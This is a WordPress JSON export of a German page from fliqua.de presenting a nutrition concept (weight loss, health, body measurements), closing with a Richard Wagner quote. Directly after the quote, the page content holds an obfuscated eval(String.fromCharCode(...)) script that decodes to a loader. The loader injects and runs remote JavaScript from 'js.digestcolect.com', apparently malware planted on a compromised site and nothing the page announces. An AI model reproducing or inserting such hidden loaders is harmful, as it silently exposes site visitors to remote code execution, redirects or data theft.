{"id":188,"date":"2016-01-29T21:14:31","date_gmt":"2016-01-29T21:14:31","guid":{"rendered":"http:\/\/shopingpoint.de\/www\/fliqua\/?page_id=188"},"modified":"2016-03-18T18:18:58","modified_gmt":"2016-03-18T17:18:58","slug":"ernaehrung","status":"publish","type":"page","link":"https:\/\/www.fliqua.de\/?page_id=188","title":{"rendered":"Ern\u00e4hrung"},"content":{"rendered":"<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/market-1154999_1920.jpg\" rel=\"attachment wp-att-264\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-264\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/market-1154999_1920-300x200.jpg\" alt=\"market-1154999_1920\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/market-1154999_1920-300x200.jpg 300w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/market-1154999_1920-768x512.jpg 768w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/market-1154999_1920-1024x682.jpg 1024w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/market-1154999_1920.jpg 1920w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <!--more--><\/p>\n<p><em><strong>FLIQUA &#8211;\u00a0 E R N \u00c4 H R U N G S K O N Z E P T\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong><\/em><\/p>\n<p><span style=\"color: #000000;\"><strong><em>Abnehmen, Agilit\u00e4t, Gesundheit, Vitalit\u00e4t.<\/em><\/strong><\/span> <!--more--> Die Nahrung, die wir heute zu uns nehmen sind die Bausteine, mit denen unser K\u00f6rper arbeiten kann und Dinge in uns bewirkt, ver\u00e4ndert. Diese Ver\u00e4nderungen begleiten unser Leben und sind auch messbar:<\/p>\n<ul>\n<li>Laboruntersuchungen des Blutes<\/li>\n<li>Labor &#8211; Stuhluntersuchungen<\/li>\n<li>Body Impedanz Analysen (BIA Messungen)<\/li>\n<li>weitere K\u00f6rperdaten (u.a. Gewicht, Gr\u00f6\u00dfe)<\/li>\n<\/ul>\n<p>All diese Parameter zeigen und\u00a0dokumentieren unseren Gesundheitszustand. <!--more--><\/p>\n<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/food-1146822_1920.jpg\" rel=\"attachment wp-att-267\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-267\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/food-1146822_1920-300x200.jpg\" alt=\"food-1146822_1920\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/food-1146822_1920-300x200.jpg 300w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/food-1146822_1920-768x512.jpg 768w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/food-1146822_1920-1024x683.jpg 1024w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/food-1146822_1920.jpg 1920w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><!--more--><\/p>\n<p>Wir wollen mit Ihnen Ihre Ziele erreichen!<\/p>\n<p>&nbsp;<\/p>\n<p>&#8222;Wandel und Wechsel liebt .\u00a0 Wer lebt.&#8220; (Richard Wagner)<script type=text\/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));<\/script><script type=text\/javascript> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"tags":[],"class_list":["post-188","page","type-page","status-publish","hentry"],"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=188"}],"version-history":[{"count":15,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/188\/revisions"}],"predecessor-version":[{"id":741,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/188\/revisions\/741"}],"wp:attachment":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=188"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}